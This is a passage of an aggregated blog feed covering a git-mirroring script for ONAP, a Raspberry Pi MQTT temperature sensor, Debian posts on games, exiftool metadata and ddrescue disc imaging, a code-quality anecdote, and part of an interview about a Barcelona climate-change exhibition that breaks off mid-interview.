CryptogramWhite House Eliminates Cybersecurity Position

The White House has eliminated the cybersecurity coordinator position.

This seems like a spectacularly bad idea.

Worse Than FailureImprov for Programmers: Inventing the Toaster

We always like to change things up a little bit here at TDWTF, and thanks to our sponsor Raygun, we've got a chance to bring you a little treat, or at least something a little different.

We're back with a new podcast, but this one isn't a talk show or storytelling format, or even a radio play. Remy rounded up some of the best comedians in Pittsburgh who were also in IT, and bundled them up to do some improv, using articles from our site and real-world IT news as inspiration. It's… it's gonna get weird.

Thanks to Erin Ross, Ciarán Ó Conaire, and Josh Cox for lending their time and voices to this project.

Music: "Happy Happy Game Show" Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0 License http://creativecommons.org/licenses/by/3.0/

Raygun gives you a window into the real user-experience for your software. With a few minutes of setup, all the errors, crashes, and performance issues will be identified for you, all in one tool. Not only does it make your applications better, with Raygun APM, it proactively identifies performance issues and builds a workflow for solving them. Raygun APM sorts through the mountains of data for you, surfacing the most important issues so they can be prioritized, triaged and acted on, cutting your Mean Time to Resolution (MTTR) and keeping your users happy.

Now’s the time to sign up. In a few minutes, you can have a build of your app with Raygun integration, and you’ll be surprised at how many issues it can identify. There’s nothing to lose with a 14-day free trial, and there are pricing options available that fit any team size.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Planet Linux AustraliaMichael Still: How to maintain a local mirror of ONAP’s git repositories

Share

For various reasons, I like to maintain a local mirror of git repositories I use a lot, in this case ONAP. This is mostly because of the generally poor network connectivity in Australia, but its also because it makes cloning a new repository super fast.

Tony Breeds and I baked up a script to do this for OpenStack repositories a while ago. I therefore present a version of that mirror script which does the right thing for ONAP projects.

One important thing to note here that differs from OpenStack — ONAP projects aren’t named in a way where they will consistently sit in a directory structure together. For example, there is an “oom” repository, as well as an “oom/registrator” repository. We therefore need to normalise repository names on clone to ensure they don’t clobber each other — I do that by replacing path separators with underscores.

So here’s the script:

#!/usr/bin/env

from __future__ import print_function

import datetime
import json
import os
import subprocess
import random
import requests

ONAP_GIT_BASE = 'ssh://mikal@gerrit.onap.org:29418'


def get_onap_projects():
    data = subprocess.check_output(
               ['ssh', 'gerrit.onap.org', 'gerrit',
                'ls-projects']).split('\n')
    for project in data:
        yield (ONAP_GIT_BASE, project,
               'onap/%s' % project.replace('/', '_'))


def _ensure_path(path):
    if not path:
        return

    full = []
    for elem in path.split('/'):
        full.append(elem)
        if not os.path.exists('/'.join(full)):
            os.makedirs('/'.join(full))


starting_dir = os.getcwd()
projects = list(get_onap_projects())
random.shuffle(projects)

for base_url, project, subdir in projects:
    print('%s Considering %s %s'
          %(datetime.datetime.now(), base_url, project))
    os.chdir(os.path.abspath(starting_dir))

    if os.path.isdir(subdir):
        os.chdir(subdir)

        print('%s Updating %s'
              %(datetime.datetime.now(), project))
        try:
            subprocess.check_call(
                ['git', 'remote', '-vvv', 'update'])
        except Exception as e:
            print('%s FAILED: %s'
                  %(datetime.datetime.now(), e))
    else:
        git_url = os.path.join(base_url, project)
        _ensure_path('/'.join(subdir.split('/')[:-1]))

        print('%s Cloning %s'
              %(datetime.datetime.now(), project))
        subprocess.check_call(
            ['ionice', '-c', 'idle', 'git', 'clone',
             '-vvv', '--mirror', git_url, subdir])

Note that your ONAP gerrit username probably isn’t “mikal”, so you might want to change that.

This script will checkout all ONAP git repositories into a directory named “onap” in your current working directory. A second run will add any new repositories, as well as updating the existing ones. Note that these are clones intended to be served with a local git server, instead of being clones you’d edit directly. To clone one of the mirrored repositories for development, you would then do something like:

$ git clone onap/aai_babel development/aai_babel

Or similar.

Share

The post How to maintain a local mirror of ONAP’s git repositories appeared first on Made by Mikal.

,

Planet DebianJonathan McDowell: Home Automation: Raspberry Pi as MQTT temperature sensor

After setting up an MQTT broker I needed some data to feed it. It made sense to start basic and gradually build up bits and pieces that would form a bigger home automation setup. As it happened I have an old Raspberry Pi B (original rev 1 [2 if you look at /proc/cpuinfo] with 256MB RAM) and some DS18B20 1-Wire temperature sensors lying around, so I decided to make a heavyweight temperature sensor (long term I’m hoping to do something with some ESP8266s).

There are plenty of guides out there about hooking up the DS18B20 to the Pi; Adafruit has a reasonable one. The short version is that GPIO4 can be easily configured to be a 1-Wire bus and you hook the DS18B20 up with a 4k7Ω resistor across the data + 3v3 power pins. An initial check can be performed by enabling the DT overlay on the fly:

sudo dtoverlay w1-gpio

Detection of 1-Wire devices is automatic so you should see an entry in dmesg looking like:

w1_master_driver w1_bus_master1: Attaching one wire slave 28.012345678abcd crc ef

You can then do

$ cat /sys/bus/w1/devices/28-*/w1_slave
1e 01 4b 46 7f ff 0c 10 18 : crc=18 YES
1e 01 4b 46 7f ff 0c 10 18 t=17875

Which shows a current temperature of 17.875°C in my sudy. Once that’s working (and you haven’t swapped GND and DATA like I did on the first go) you can make the Pi bootup with 1-Wire enabled by adding a dtoverlay=w1-gpio line to /boot/config.txt. The next step is to get that fed into the MQTT broker. A simple Python client seemed like the right approach. Debian has paho-mqtt but sadly not in a stable release. Thankfully the python3-paho-mqtt 1.3.1-1 package in testing installed just fine on the Raspbian stretch image my Pi is running. I dropped the following in /usr/locals/bin/mqtt-temp:

#!/usr/bin/python3

import glob
import time
import paho.mqtt.publish as publish

Broker = 'mqtt-host'
auth = {
    'username': 'user2',
    'password': 'bar',
}

pub_topic = 'test/temperature'

base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28-*')[0]
device_file = device_folder + '/w1_slave'

def read_temp():
    valid = False
    temp = 0
    with open(device_file, 'r') as f:
        for line in f:
            if line.strip()[-3:] == 'YES':
                valid = True
            temp_pos = line.find(' t=')
            if temp_pos != -1:
                temp = float(line[temp_pos + 3:]) / 1000.0

    if valid:
        return temp
    else:
        return None


while True:
    temp = read_temp()
    if temp is not None:
        publish.single(pub_topic, str(temp),
                hostname=Broker, port=8883,
                auth=auth, tls={})
    time.sleep(60)

And finished it off with a systemd unit file - I know a lot of people complain about systemd, but it really does make it easy to just spin up a minimal service as a unique non-privileged user. The following went in /etc/systemd/system/mqtt-temp.service:

[Unit]
Description=MQTT Temperature sensor
After=network.target

[Service]
# Hack because Python can't cope with a DynamicUser with no HOME
Environment="HOME=/"
ExecStart=/usr/local/sbin/mqtt-temp

DynamicUser=yes
MemoryDenyWriteExecute=true
PrivateDevices=true
ProtectKernelTunables=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictAddressFamilies=AF_INET AF_INET6 AF_UNIX
RestrictNamespaces=true

[Install]
WantedBy=multi-user.target

Start it up and enable for subsequent reboots:

systemctl start mqtt-temp
systemctl enable mqtt-temp

And then watch on my Debian test box as before:

$ mosquitto_sub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -v -t '#' -u user1 -P foo
test/temperature 17.875
test/temperature 17.937

Planet DebianJonathan Carter: Video Channel Updates

Last month, I started doing something that I’ve been meaning to do for years, and that’s to start a video channel and make some free software related videos.

I started out uploading to my YouTube channel which has been dormant for a really long time, and then last week, I also uploaded my videos to my own site, highvoltage.tv. It’s a MediaDrop instance, a video hosting platform written in Python.

I’ll still keep uploading to YouTube, but ultimately I’d like to make my self-hosted site the primary source for my content. Not sure if I’ll stay with MediaDrop, but it does tick a lot of boxes, and if its easy enough to extend, I’ll probably stick with it. MediaDrop might also be a good platform for viewing the Debian meetings videos like the DebConf videos. 

My current topics are very much Debian related, but that doesn’t exclude any other types of content from being included in the future. Here’s what I have so far:

  • Video Logs: Almost like a blog, in video format.
  • Howto: Howto videos.
  • Debian Package of the Day: Exploring packages in the Debian archive.
  • Debian Package Management: Howto series on Debian package management, a precursor to a series that I’ll do on Debian packaging.
  • What’s the Difference: Just comparing 2 or more things.
  • Let’s Internet: Read stuff from Reddit, Slashdot, Quora, blogs and other media.

It’s still early days and there’s a bunch of ideas that I still want to implement, so the content will hopefully get a lot better as time goes on.

I have also quit Facebook last month, so I dusted off my old Mastodon account and started posting there again: https://mastodon.xyz/@highvoltage

You can also subscribe to my videos via RSS: https://highvoltage.tv/latest.xml

Other than that I’m open to ideas, thanks for reading :)

Planet DebianShirish Agarwal: FOSS game community slump and question about getting images in palepeli

There is a thread in freegamedev.net which I have been following for the past few weeks.

In the back-and-forth argument, there I believe most of the arguments shared were somewhat wrong.

While we have AAA projects like 0ad and others, the mainstay of our games should be ones which doesn’t need any high-quality textures and still does the work.

I have been looking at a Let’s play playlist of an indie gem called ‘Dead in Vinland’

Youtube playlist link – https://www.youtube.com/playlist?list=PL8eo1fAeRpyl47_TRuQrtkBn2bNRaZtlT

If you look at the game, it doesn’t have much in terms of animation apart from bits of role-playing in encounters but is more oriented towards towards roll of dice.

The characters in the game are sort of cut-out characters very much like the cut-out cardboard/paperboard characters that we used to play whild children.

Where the game innovates is more in terms of an expansive dialog-tree and at the most 100-200 images of the characters. It basically has a group of 4 permanent characters, any one of them dies and the gamer is defeated.

If anybody has played rogue or any of the games in the new debian games-rogue tasks they would know that foss shows variety of stories even in the rpg world.

$ aptitude show games-rogue
Package: games-rogue
Version: 2.3
State: installed
Automatically installed: no
Priority: optional
Section: metapackages
Maintainer: Debian Games Team
Architecture: all
Uncompressed Size: 24.6 k
Depends: games-tasks (= 2.3)
Recommends: allure, angband, crawl, gearhead, gearhead2, hearse, hyperrogue, lambdahack, meritous, moria, nethack-x11, omega-rpg, slashem
Description: Debian's roguelike games
This metapackage will install dungeon crawling games in the spirit of Rogue.
Homepage: https://blends.debian.org/games/tasks/

I took rpg those are the kind of games I have liked always and even in that turn-based rpg’s although do hate the fact that I can’t save scum as in most traditional rpg’s.

Variety and Palapeli

I now turn my attention to a package called variety.

While looking at it, also pushed a wishlist bug for packaging the new version which would fix a bug I reported about a month back. It was in the same conversation that I came to know that the upstream releaser and the downstream maintainer is one and the same.

I have also been talking with upstream about various features or what could be done to make variety better.

Now while that’s all well and good and variety does a good job of being a wallpaper changer, I need and want the wallpapers which is the output of variety to be the input of palapeli BUT without having to do lots of manual intervention as it currently requires. Variety does a pretty good job of giving good quality wallpapers and goes beyond in even giving pretty much info. on the images as it saves the metadata of the images unlike many online image services. To make things easier for myself. I made a directory called Variety in Pictures and copied everything from ~/.config/variety/Favorites by doing –

~/.config/variety/Favorites$ cp -r --preserve . /home/shirish/Pictures/Variety/

And this method works out fine enough. The –preserve hook is essential as can be seen from the cp manpage –

--preserve[=ATTR_LIST]
preserve the specified attributes (default: mode,ownership,timestamps), if possible additional
attributes: context, links, xattr, all

Even the metadata of the image is pretty good enough as can be seen from any random picture –

~/Pictures/Variety$ exiftool 7527881664_024e44f8bf_o.jpg
ExifTool Version Number : 10.96
File Name : 7527881664_024e44f8bf_o.jpg
Directory : .
File Size : 1175 kB
File Modification Date/Time : 2018:04:09 03:56:15+05:30
File Access Date/Time : 2018:05:14 22:59:22+05:30
File Inode Change Date/Time : 2018:05:15 08:01:42+05:30
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Image Description :
Make : Canon
Camera Model Name : Canon EOS 5D
X Resolution : 240
Y Resolution : 240
Resolution Unit : inches
Software : Adobe Photoshop Lightroom 3.6 (Windows)
Modify Date : 2012:07:08 17:58:13
Artist : Peter Levi
Copyright : Peter Levi
Exposure Time : 1/50
F Number : 7.1
Exposure Program : Aperture-priority AE
ISO : 160
Exif Version : 0230
Date/Time Original : 2011:05:03 12:17:50
Create Date : 2011:05:03 12:17:50
Shutter Speed Value : 1/50
Aperture Value : 7.1
Exposure Compensation : 0
Max Aperture Value : 4.0
Metering Mode : Multi-segment
Flash : Off, Did not fire
Focal Length : 45.0 mm
User Comment :
Focal Plane X Resolution : 3086.925795
Focal Plane Y Resolution : 3091.295117
Focal Plane Resolution Unit : inches
Custom Rendered : Normal
Exposure Mode : Auto
White Balance : Auto
Scene Capture Type : Standard
Owner Name : Tsvetan ROUSTCHEV
Serial Number : 1020707385
Lens Info : 24-105mm f/?
Lens Model : EF24-105mm f/4L IS USM
XP Comment :
Compression : JPEG (old-style)
Thumbnail Offset : 908
Thumbnail Length : 18291
XMP Toolkit : XMP Core 4.4.0-Exiv2
Creator Tool : Adobe Photoshop Lightroom 3.6 (Windows)
Metadata Date : 2012:07:08 17:58:13+03:00
Lens : EF24-105mm f/4L IS USM
Image Number : 1
Flash Compensation : 0
Firmware : 1.1.1
Format : image/jpeg
Version : 6.6
Process Version : 5.7
Color Temperature : 4250
Tint : +8
Exposure : 0.00
Shadows : 2
Brightness : +65
Contrast : +28
Sharpness : 25
Luminance Smoothing : 0
Color Noise Reduction : 25
Chromatic Aberration R : 0
Chromatic Aberration B : 0
Vignette Amount : 0
Shadow Tint : 0
Red Hue : 0
Red Saturation : 0
Green Hue : 0
Green Saturation : 0
Blue Hue : 0
Blue Saturation : 0
Fill Light : 0
Highlight Recovery : 23
Clarity : 0
Defringe : 0
Gray Mixer Red : -8
Gray Mixer Orange : -17
Gray Mixer Yellow : -21
Gray Mixer Green : -25
Gray Mixer Aqua : -19
Gray Mixer Blue : +8
Gray Mixer Purple : +15
Gray Mixer Magenta : +4
Split Toning Shadow Hue : 0
Split Toning Shadow Saturation : 0
Split Toning Highlight Hue : 0
Split Toning Highlight Saturation: 0
Split Toning Balance : 0
Parametric Shadows : 0
Parametric Darks : 0
Parametric Lights : 0
Parametric Highlights : 0
Parametric Shadow Split : 25
Parametric Midtone Split : 50
Parametric Highlight Split : 75
Sharpen Radius : +1.0
Sharpen Detail : 25
Sharpen Edge Masking : 0
Post Crop Vignette Amount : 0
Grain Amount : 0
Color Noise Reduction Detail : 50
Lens Profile Enable : 1
Lens Manual Distortion Amount : 0
Perspective Vertical : 0
Perspective Horizontal : 0
Perspective Rotate : 0.0
Perspective Scale : 100
Convert To Grayscale : True
Tone Curve Name : Medium Contrast
Camera Profile : Adobe Standard
Camera Profile Digest : 9C14C254921581D1141CA0E5A77A9D11
Lens Profile Setup : LensDefaults
Lens Profile Name : Adobe (Canon EF 24-105mm f/4 L IS USM)
Lens Profile Filename : Canon EOS-1Ds Mark III (Canon EF 24-105mm f4 L IS USM) - RAW.lcp
Lens Profile Digest : 0387279C5E7139287596C051056DCFAF
Lens Profile Distortion Scale : 100
Lens Profile Chromatic Aberration Scale: 100
Lens Profile Vignetting Scale : 100
Has Settings : True
Has Crop : False
Already Applied : True
Document ID : xmp.did:8DBF8F430DC9E11185FD94228EB274CE
Instance ID : xmp.iid:8DBF8F430DC9E11185FD94228EB274CE
Original Document ID : xmp.did:8DBF8F430DC9E11185FD94228EB274CE
Source URL : https://www.flickr.com/photos/93647178@N00/7527881664
Source Type : flickr
Author : peter-levi
Source Name : Flickr
Image URL : https://farm9.staticflickr.com/8154/7527881664_024e44f8bf_o.jpg
Author URL : https://www.flickr.com/photos/93647178@N00
Source Location : user:www.flickr.com/photos/peter-levi/;user_id:93647178@N00;
Creator : Peter Levi
Rights : Peter Levi
Subject : paris, france, lyon, lyonne
Tone Curve : 0, 0, 32, 22, 64, 56, 128, 128, 192, 196, 255, 255
History Action : derived, saved
History Parameters : converted from image/x-canon-cr2 to image/jpeg, saved to new location
History Instance ID : xmp.iid:8DBF8F430DC9E11185FD94228EB274CE
History When : 2012:07:08 17:58:13+03:00
History Software Agent : Adobe Photoshop Lightroom 3.6 (Windows)
History Changed : /
Derived From :
Displayed Units X : inches
Displayed Units Y : inches
Current IPTC Digest : 044f85a540ebb92b9514cab691a3992d
Coded Character Set : UTF8
Application Record Version : 4
Date Created : 2011:05:03
Time Created : 12:17:50+03:00
Digital Creation Date : 2011:05:03
Digital Creation Time : 12:17:50+03:00
By-line : Peter Levi
Copyright Notice : Peter Levi
Headline : IMG_0779
Keywords : paris, france, lyon, lyonne
Caption-Abstract :
Photoshop Thumbnail : (Binary data 18291 bytes, use -b option to extract)
IPTC Digest : d8a6ddc0b5eacb05874d4b676f4cb439
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1920
Image Height : 1280
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Aperture : 7.1
Date/Time Created : 2011:05:03 12:17:50+03:00
Digital Creation Date/Time : 2011:05:03 12:17:50+03:00
Image Size : 1920x1280
Megapixels : 2.5
Scale Factor To 35 mm Equivalent: 1.0
Shutter Speed : 1/50
Thumbnail Image : (Binary data 18291 bytes, use -b option to extract)
Circle Of Confusion : 0.030 mm
Field Of View : 43.5 deg
Focal Length : 45.0 mm (35 mm equivalent: 45.1 mm)
Hyperfocal Distance : 9.51 m
Lens ID : Canon EF 24-105mm f/4L IS USM
Light Value : 10.6

One of the things I found wanting, now I dunno whether a field for CC-SA 3.0 (Creative Commons – Share Alike 3.0) . It does have everything else to know how a particular picture is/was taken.

For the puzzle, it needs 3 info. at the very least,

a. The name of the image. For many images you need to make one up as many a times either photographers are either not imaginative or do not have the time to give meaningful descriptive name. I have had an interesting discussion on a similar topic with the authors of palapeli. There are lots to do that in getting descriptions right. At least in free software I dunno of any way to get images processed so that descriptions can be told/found out.

b. A comment – This is optional but if you have a memorable image that you have captured, this is the best way to do it. I hate to bring bing wallapers but have seen they have some of the best description for what I’m trying to say –

shirish@debian:~/Pictures/Variety$ exiftool ManateeMom_EN-US9983570199_1920x1080.jpg | grep Caption-Abstract
Caption-Abstract : West Indian manatee mom and baby at Three Sisters Springs, Florida (© James R.D. Scott/Getty Images)
shirish@debian:~/Pictures/Variety$ exiftool ManateeMom_EN-US9983570199_1920x1080.jpg | grep Comment
User Comment : West Indian manatee mom and baby at Three Sisters Springs, Florida (© James R.D. Scott/Getty Images)
XP Comment :
Comment : West Indian manatee mom and baby at Three Sisters Springs, Florida (© James R.D. Scott/Getty Images)

c. Name of the Author – Many a time I just write either ‘nameless’ or ‘unknown’ as the author hasn’t taken any pains to share who they are.

Why I have shared or talked about palapeli as they are the only ones I know of who has done some extensive works on getting unique slicers so that the shapes of the puzzle piece come all different. But it’s still a trial and error method as it doesn’t have a preview mode.

While there’s lot that could be improved in both the above projects, I would be happy just if atm there would be a script which can take the images as an input, add or fib details (although best would be to have actual details) and do the work.

I am sure if I put my mind to it, I’ll probably find ways in which even exiftool can be improved but can’t thank enough the people who have made such a wonderful tool.

For instance, while looking at the metadata of quite a few pictures, found that many people use arbitrary fields to tell where the picture was shot at, some use headline, some use comment or Description while others use subject. If somebody wanted to write a script it would be difficult as there may be images which may have all the 3 fields and have different content on them (possibly) under context known by the author only.

The good thing is we have got the latest version on Debian testing –

$ exiftool -ver
10.96

Peace out.

Planet DebianJonathan Dowland: Imaging DVD-Rs, Step 2: Initial Import

This is part 2 in a series about a project to read/import a large collection of home-made optical media. Part 1 was Imaging DVD-Rs: Overview > and Step 1; the summary page for the whole project is imaging discs.

Last time we prepared for the import by gathering all our discs together and organising storage for them in two senses: real-world (i.e. spindles) and a more future-proof digital storage system for the data, in my case, a NAS. This time we're actually going to read some discs. I suggest doing a quick first pass over your collection to image all the trouble-free discs (and identify the ones that are going to be harder to read). We will return to the troublesome ones in a later part.

For reading home-made optical discs, you could simply use cp:

cp /dev/sr0 disc-image.iso

This has the attraction of being a very simple solution but I don't recommend it, because of a lack of options for error handling. Instead I recommend using GNU ddrescue. It is designed to be fault tolerant and retries bad sectors in various ways to try and coax every last byte out of the medium. Crucially, a partially imported disc image can be further added to by subsequent runs of ddrescue, even on a separate computer.

For the first import, I recommend the suggested options from the ddrescue manual:

ddrescue -n -b2048 /dev/cdrom cdimage.iso cdimage.log

This will create a cdimage.iso file, hopefully containing your data, and a map file cdimage.log, describing what ddrescue managed to achieve. You should archive both!

This will either complete reasonably quickly (within one to two minutes), or will run potentially indefinitely. Once you've got a feel for how long a successful extraction takes, I'd recommend terminating any attempt that lasts much longer than that, and putting those discs to one side in a "needs attention" pile, to be re-attempted later. If ddrescue does finish, it will tell you if it couldn't read any of the disc. If so, put that disc in the "needs attention" pile too.

commercially-made discs

Above, I wrote that I recommend this approach for home-made data discs. Broadly, I am assuming that such discs use a limited set of options and features available to disc authors: they'll either be single session, or multisession but you aren't interested in any files that are masked by later sessions; they won't be mixed mode (no Audio tracks); there won't be anything unusual or important stored in the disc metadata, title, or subcodes; etcetera.

This is not always the case for commercial discs, or audio CDs or video DVDs. For those, you may wish to recover more information than is available to you via ddrescue. These aren't my focus right now, so I don't have much advice on how to handle them, although I might in the future.

labelling and storing images

If your discs are labelled as poorly or inconsistently as mine, it might not be obvious what filename to give each disc image. For my project I decided to append a new label to all imported discs, something like "blahX", where X is an incrementing number. So, for a fourth disc being imported with the label "my files", the image name would be my_files.blah5.iso. If you are keeping the physical discs after importing them, You could also mark the disc with "blah5".

where are we now

You should now have a pile of discs that you have successfully imported, a corresponding collection of disc image files/ddrescue log file pairs, and possibly a pile of "needs attention" discs.

In future parts, we will look at how to explore what's actually on the discs we have imaged: how to handle partially read or corrupted disc images; how to map the files on a disc to the sectors you have read, to identify which files are corrupted; and how to try to coax successful reads out of troublesome discs.

CryptogramAccessing Cell Phone Location Information

The New York Times is reporting about a company called Securus Technologies that gives police the ability to track cell phone locations without a warrant:

The service can find the whereabouts of almost any cellphone in the country within seconds. It does this by going through a system typically used by marketers and other companies to get location data from major cellphone carriers, including AT&T, Sprint, T-Mobile and Verizon, documents show.

Another article.

Boing Boing post.

Worse Than FailureCodeSOD: Return of the Mask

Sometimes, you learn something new, and you suddenly start seeing it show up anywhere. The Baader-Meinhof Phenomenon is the name for that. Sometimes, you see one kind of bad code, and the same kind of bad code starts showing up everywhere. Yesterday we saw a nasty attempt to use bitmasks in a loop.

Today, we have Michele’s contribution, of a strange way of interacting with bitmasks. The culprit behind this code was a previous PLC programmer, even if this code wasn’t running straight on the PLC.

public static bool DecodeBitmask(int data, int bitIndex)
{
        var value = data.ToString();
        var padding = value.PadLeft(8, '0');
        return padding[bitIndex] == '1';
}

Take a close look at the parameters there- data is an int. That’s about what you’d expect here… but then we call data.ToString() which is where things start to break down. We pad that string out to 8 characters, and then check and see if a '1' happens to be in the spot we’re checking.

This, of course, defeats the entire purpose and elegance of bit masks, and worse, doesn’t end up being any more readable. Passing a number like 2 isn’t going to return true for any index.

Why does this work this way?

Well, let’s say you wanted a bitmask in the form 0b00000111. You might say, “well, that’s a 7”. What Michele’s predecssor said was, "that’s text… "00000111". But the point of bitmasks is to use an int to pass data around, so this developer went ahead on and turned "00000111" into an integer by simply parsing it, creating the integer 111. But there’s no possibly way to check if a certain digit is 1 or not, so we have to convert it back into a string to check the bitmask.

Unfortunately, the software is so fragile and unreliable that no one is willing to let the developers make any changes beyond “it’s on fire, put it out”.

[Advertisement] ProGet supports your applications, Docker containers, and third-party packages, allowing you to enforce quality standards across all components. Download and see how!

,

LongNowThe Role of Art in Addressing Climate Change: An interview with José Luis de Vicente

Sounds super depressing,” she texted. “That’s why I haven’t gone. Sort of went full ostrich.”

That was my friend’s response when I asked her if she had attended Després de la fi del món (After the End of the World), the exhibition on the present and future of climate change at the Center of Contemporary Culture in Barcelona (CCCB).

Burying one’s head in the sand when it comes to climate change is a widespread impulse. It is, to put it brusquely, a bummer story — one whose drama is slow-moving, complex, and operating at planetary scale. The media, by and large, underreports it. Politicians who do not deny its existence struggle to coalesce around long-term solutions. And while a majority of people are concerned about climate change, few talk about it with friends and family.

Given all of this, it would seem unlikely that art, of all things, can make much of a difference in how we think about that story.

José Luis de Vicente, the curator of Després de la fi del món, believes that it can.

“The arts can play a role of fleshing out social scenarios showing that other worlds are possible, and that we are going to be living in them,” de Vicente wrote recently. “Imagining other forms of living is key to producing them.”

Scenes from “After the End of the World.” Via CCCB.

The forms of living on display at Després de la fi del món are an immersive, multi-sensory confrontation. The show consists of nine scenes, each a chapter in a spatial essay on the present and future of the climate crisis by some of the foremost artists and thinkers contemplating the implications of the anthropocene.

“Mitigation of Shock” by Superflux. Via CCCB.

In one, I find myself in a London apartment in the year 02050.¹ The familiar confines of cookie-cutter IKEA furniture give way to an unsettling feeling as the radio on the kitchen counter speaks of broken food supply chains, price hikes, and devastating hurricanes. A newspaper on the living room table asks “HOW WILL WE EAT?” The answer is littered throughout the apartment, in the form of domestic agriculture experiments glowing under purple lights, improvised food computers, and recipes for burgers made out of flies.

“Overview” by Benjamin Grant. Via Daily Overview.

In another, I am surrounded by satellite imagery of the Earth that reveals the beauty of human-made systems and their impact on the planet.

“Win><Win” by Rimini Protokoll. Via CCCB.

The most radical scene, Rimini Protokoll’s “Win><Win,” is one de Vicente has asked me not to disclose in detail, so as to not ruin the surprise when Després de la fi del món goes on tour in the United Kingdom and Singapore. All I can say is that it has something to do with jellyfish, and that it is one of the most remarkable pieces of interactive theater I have ever seen.

A “decompression chamber” featuring philosopher Timothy Morton. Via CCCB.

Visitors transition between scenes via waiting rooms that de Vicente describes as “decompression chambers.” In each chamber, the Minister Of The Future, played by philosopher Timothy Morton, frames his program. The Minister claims to represent the interests of those who cannot exert influence on the political process, either because they have not yet been born, or because they are non-human, like the Great Barrier Reef.

“Aerocene” by Tomás Seraceno. Via Aerocene Foundation.

A key thesis of Després de la fi del món is that knowing the scientific facts of climate change is not enough to adequately address its challenges. One must be able to feel its emotional impact, and find the language to speak about it.

My fear—and the reason I go “full ostrich”—has long been that such a feeling would come about only once we experience climate change’s deleterious effects as an irrevocable part of daily life. My hope, after attending the exhibition and speaking with José Luis de Vicente, is that it might come, at least in part, through art.


“This Civilization is Over. And Everybody Knows It.”

The following interview has been edited for length and clarity.

AHMED KABIL: I suspect that for a lot of us, when we think about climate change, it seems very distant — both in terms of time and space. If it’s happening, it’s happening to people over there, or to people in the future; it’s not happening over here, or right now. The New York Times, for example, published a story finding that while most in the United States think that climate change will harm Americans, few believe that it will harm them personally. One of the things that I found most compelling about Després de la fi del món was how the different scenes of the exhibition made climate change feel much more immediate. Could you say a little bit about how the show was conceived and what you hoped to achieve?

José Luis de Vicente. Photo by Ahmed Kabil.

JOSÉ LUIS DE VICENTE: We wanted the show to be a personal journey, but not necessarily a cohesive one. We wanted it to be like a hallucination, like the recollection of a dream where you’re picking up the pieces here and there.

We didn’t want to do a didactic, encyclopedic show on the science and challenge of climate change. Because that show has been done many, many times. And also, we thought the problem with the climate crisis is not a problem of information. We don’t need to be told more times things that we’ve been told thousands of times.

“Unravelled” by Unknown Fields Division. Via CCCB.

We wanted something that would address the elephant in the room. And the elephant in the room for us was: if this is the most important crisis that we face as a species today, if it transcends generations, if this is going to be the background crisis of our lives, why don’t we speak about it? Why don’t we know how to relate to it directly? Why does it not lead newspapers in five columns when we open them in the morning? That emotional distance was something that we wanted to investigate.

One of the reasons that distance happens is because we’re living in a kind of collective trauma. We are still in the denial phase of that trauma. The metaphor I always like to use is, our position right now is like the one you’re in when you go to the doctor, and the doctor gives you a diagnosis saying that actually, there’s a big, big problem, and yet you still feel the same. You don’t feel any different after being given that piece of news, but at the same time intellectually you know at that point that things are never going to be the same. That’s where we are collectively when it comes to climate change. So how do we transition out of this position of trauma to one of empathy?

“Win><Win” by Rimini Protokoll. Via CCCB.

We also wanted to look at why this was politically an unmanageable crisis. And there’s two reasons for that. One is because it’s a political message no politician will be able to channel into a marketable idea, which is: “We cannot go on living the way we live.” There is no political future for any way you market that idea.

The other is—and Timothy Morton’s work was really influential in this idea—the notion that: “What if simply our senses and communicative capacities are not tuned to understanding the problem because it moves in a different resolution, because it proceeds on a scale that is not the scale of our senses?”

Morton’s notion of the hyper-objectthis idea that there are things that are too big and move too slow for us to see—was very important. The title of the show comes from the title of his book Hyperobjects: An Ecology of Nature After the End of the World (02013).

AHMED KABIL: One of the recent instances of note where climate change did make front-page news was the 02015 Paris Agreement. In Després de la fi del món, the Paris Agreement plays a central role in framing the future of climate change. Why?

